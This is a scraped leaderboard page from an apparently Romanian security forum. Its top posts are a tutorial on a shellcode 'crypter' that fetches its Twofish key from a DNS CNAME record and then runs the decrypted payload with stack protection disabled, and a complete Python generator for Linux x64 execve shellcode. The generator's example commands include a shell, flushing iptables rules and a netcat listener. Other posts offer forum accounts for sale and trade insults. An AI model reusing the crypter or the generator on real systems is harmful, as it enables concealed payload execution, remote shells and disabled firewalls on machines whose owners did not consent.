Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 05/22/18 in all areas

  1. I altered the Decrypter.c, not to get the raw password from the CNAME record from password.andrelima.info , but instead to get an hex encoded password from the same record in passwordhex.andrelima.info This feature allows the Crypter to encrypt the shellcode with passwords containing special characters. So, bear in mind some screenshots below might be outdated, but not the following: Crypter now presenting the password used secret_%”123 in hex to insert in the CNAME record Code added to Decrypter.c to decode the hex encoded password retrieved Successful hex encoded password retrieval, decoding, and decryption of shellcode A crypter is code that decrypts a previously encrypted payload, in this case a shellcode, and will then execute it. To encrypt it I chose one of the algorithms that went through the final round of AES: Twofish. But to make this one unique, I decided not to request the password to decrypt the payload from the user (usually as the first parameter to the executable in the command line) but, instead, to get it from a DNS request (CNAME record) to the host “password.andrelima.info” which will return the password in the following format: <password>.andrelima.info But first things first. While I did quite a lot of rewriting, adapting, and debugging, the code I’ll be presenting is mostly derived from a Twofish optimised C implementation by Drew Csillag, and a DNS query code in C by Silver Moon. The latter was chosen due to only using linux sockets, reducing any external library dependencies to a minimum. 1. Shellcode / Payload The payload used in an execve stack implementation, which means that, after executing it, a command line prompt should present itself, as follows: Figure 1 – execve code Figure 2 – execution The full explanation on this and other shellcodes I’ve developed can be found on one of my previous posts from which some, that I submitted into Exploit DB, got accepted. 2. Crypter As previously stated, the code base for the Twofish encryption was downloaded here, as it was the fastest implementation, in a reliable source, I could find. I then proceeded with adapting it to encrypt a shellcode and produce its output in hexadecimal format. Figure 3 – Crypter code to encrypt the shellcode The password, that the code will be using, shall be set as a command line parameter (argv[1]). The 128 bit encryption key is first set to all zeroes (cleanup for consistency certainty in the decryption process) and only then the given password is copied into the 16 bytes (128b) char array. It is important to note that Twofish is a 128 bit block cipher. This means that, in the case of the shellcode, if its size is not an exact multiple of the block size, some padding will exist. In my first implementation I had the padding all set to zeroes. But in order to avoid any known-plaintext attacks, I later decided to generate a random stream of bytes. These random bytes will be of no consequence to the shellcode when decrypted, because after the last instruction (syscall – Figure 1, Line 18) nothing else will be executed. As stated by the execve documentation: This means that after the syscall instruction, we can have any random bytes and they’ll be of no consequence to the code execution. This is great, because I don’t need to worry about removing them at all. One final note, regarding the compilation of the Crypter.c file, is that it requires giving GCC the “-O3” and “-fomit-frame-pointer” flags, as stated in the original code’s initial comments. The code uses some C optimisation techniques and it requires these flags to be able to compile it correctly. Another issue to be careful about, is the fact that the header file tables.h doesn’t exist originally in the Twofish download. It is actually generated by the provided python script as follows: python makeCtables.py > tables.h gcc -O3 -fomit-frame-pointer Crypter.c tables.h -o Crypter After executing the crypter (which will produce a different output – actually just the last 128 bit block – every time it’s executed, due to the random byte stream generated to pad the original shellcode): Figure 4 – Encrypted shellcode generated with password “secret123” The password to decrypt the shellcode is set in the command line to the crypter: secret123 3. The DNS setup The DNS setup is how I decided to store the password for decrypting the shellcode. The point is to have it as a CName DNS record associated with the host password.andrelima.info : Figure 5 – Domain name service provider CNAME configuration This can be easily verified with the dig tool (dig password.andrelima.info cname +short): Figure 6 – CName retrieval using dig command line tools Of course one could set a local DNS server and test this functionality (e.g. bind9), but I already owned the domain “andrelima.info” and all I had to do was go in the DNS management page and add a record (Figure 5), which I’ll leave as is, for anyone who wishes to quickly test the code. 4. Decrypter Now that the password is set, its retrieval is exactly the first thing the Decrypter will need to do: Figure 7 – DNS CName password retrieval The ngethostbyname will basically get the DNS record type specified as the second parameter (CName), which is associated with the host in the first parameter. It then proceeds to extracting the password from the retrieved string <password>.andrelima.info. An improvement to this code will be to encode the password to make it possible to use any special characters in it. Hex format would be great, as it would be acceptable in the URL format to have something like 03f78b…a18d.andrelima.info. So after getting the password, the code moves on to decrypting the encrypted shellcode shown in Figure 4: Figure 8 – Code decrypting the encrypted shellcode from Fig 4 To compile this, we run: gcc -O3 -fomit-frame-pointer -fno-stack-protector -z execstack Decrypter.c tables.h -o Decrypter This command now has the flags -fno-stack-protector -z execstack to allow for the execution of code in the stack – our decrypted shellcode. And it then runs smoothly as expected (with some unnecessary but convenient debugging information): Figure 9 – running the Decrypter You can find all the files on my gitlab account. Source: https://pentesterslife.blog/2018/02/02/twofish-crypter-with-dns-cname-password-retrieval-x64-shellcode-decryption-and-execution/
    2 points
  2. Pe tine nu te ajuta, insa altora le spune multe
    1 point
  3. dupa o zi deja ai -20 rep, clara treaba nu stiu cum sa-ti zic, da genul tau de persoana nu e bine venit aici, in sensul ca intr-un anume fel esti prea serios, zici ca esti la un interviu de angajare, vorbesti mult prea politicos.
    1 point
  4. This script is a Linux/x64 assembly shellcode generator. Download: https://dl.packetstormsecurity.net/shellcode/shellcode-generator.txt Mirror: #!/usr/bin/env python # # Features: # - Linux shellcode x64 assembly code generation # - stack based (smaller payload size) # - execve based # - supports long commands (meaning bigger than an x64 register - 64 bits) # - supports long parameters (meaning bigger than an x64 register - 64 bits) # - one command only (execve will alter the current memory proc and when it exits there's no continuation) # - supports command with up to 8 parameters # # Instructions # - requires full path to the command # - only one command is supported due to execve transforming the current process into a new one, loosing all previous context (any other instructions that would have been executed) # - after having the x64 generated assembly code: # - copy paste it into a file (in a Linux environment) - example.nasm # - execute: # nasm -felf64 example.nasm -o example.o && ld example.o -o example # # Author: Andre Lima @0x4ndr3 # https://pentesterslife.blog # ######## command = "/bin/sh" #command = "/sbin/iptables -F INPUT" #command = "/bin/nc -lvp 3000" #command = "/bin/echo 1 2 3 4 5 6 7 longparamparamparam" def tohex(val, nbits): return hex((val + (1 << nbits)) % (1 << nbits)) code = "" code += "global _start\n" code += "section .text\n" code += "\n" code += "_start:\n" code += "push 59\n" code += "pop rax\n" code += "cdq\n" code += "push rdx\n" params = command.split(' ') try: params.remove('') # in case of multiple spaces in between params in the command - cleanup except: # it throws an exception if it doesn't finds one pass if len(params[0]) % 8 != 0: command = "/"*(8-len(params[0])%8) + params[0] iters = len(command)/8 - 1 while iters >= 0: block = command[iters*8:iters*8+8] code += "mov rbx, 0x" + block[::-1].encode("hex") + "\n" code += "push rbx\n" iters -= 1 code += "push rsp\n" code += "pop rdi\n" aux_regs = ["r8","r9","r10","r11","r12","r13","r14","r15"] i = 0 params = params[1:] # remove first element - command itself. we just want the params if len(params) > len(aux_regs): print "More than " + str(len(aux_regs)) + " parameters... Unsupported." exit(1) for p in params: code += "push rdx\n" if len(p) % 8 != 0: p += "\x00"*(8-len(p)%8) iters = len(p)/8 -1 while iters >= 0: # each param block = p[iters*8:iters*8+8] code += "mov rbx, 0x" + tohex(~int(block[::-1].encode("hex"),16),64)[2:2+16] + "\n" code += "not rbx\n" code += "push rbx\n" iters -= 1 code += "push rsp\n" code += "pop " + aux_regs[i] + "\n" i += 1 code += "push rdx\n" code += "push rsp\n" code += "pop rdx\n" while i>0: i -= 1 code += "push " + aux_regs[i] + "\n" code += "push rdi\n" code += "push rsp\n" code += "pop rsi\n" code += "syscall\n" print code Source
    1 point
  5. https://mega.nz/#!mspQCDRb!ae-9Zo8nC-V7hpywIptYPX7e6iPgy5HlRH8bSdpuD-Y
    1 point
  6. De cand si pana cand windows 7 vine cu .net framework 4 preinstalat? http://recordit.co/KjQW0EmS8q
    1 point
  7. vezi pm mai am inca 3 pt 3 persoane care imi trimit pm, sa fiti si voi mai vechi si cu putina activitate. poate nu e corect sa le postez sa aiba noroc plebii cu cont de 2 zile
    -1 points
  8. am eu cont, ti-l dau cu tot cu mail. sa vad insa daca pot obtine invitatie. ce pret oferi?
    -1 points
  9. ce parere aveti de acesti bloggerasi si mici afaceristi care aveau siteurile hostate aici ? era ieftin si rapid, foarte putini au backup si acum plang pe blogul lui zoso care le-a facut reclama si inca le ia apararea si acum cu fraze de genul " platiti 3 euro si vreti calitate " https://www.webgraphic.ro/blog/webfactor-picat-siteuri-inchise/
    -1 points
  10. Trader😂😂 ești 100% un spammer jegos, PACE!
    -1 points
  11. bayetzy mey sunt hall of fame sy yty luam mortyn pl! @WormValoare2018 @coaiemari
    -1 points
  12. Trag pamant pe tine. Acum e problema si ca urez la multi ani? Inteleg ca esti ofticat, dar mai usor ca iti pocnesc venele la gat.
    -1 points
  13. =))) Ce glumeti copii de pe aici.
    -1 points
  14. Nu cred ca ne-am inteles. Eu sunt aici cu un motiv, nu sa ma amenint cu voi, degeaba o facem. Sa ai si tu o zi frumoasa!
    -1 points
  15. Mesajul a venit doar din dorinta de a te razbuna pentru ca ti-am dat down. Nu stiu ce sa cred, dar tot posibilul sa ai multiaccount ori cu ,,prietenii,, tai yoyois si spider. Spamer nu sunt, caut doar sa ajung in ,,Marketplace,, , doar ca mai pe toate forumurile se dau de despteti si inteligenti ca voi. Dar sincer, nu ma doare, asta e viata, primesti un prost, il faci sa inteleaga ca e prost.
    -2 points
×
×
  • Create New...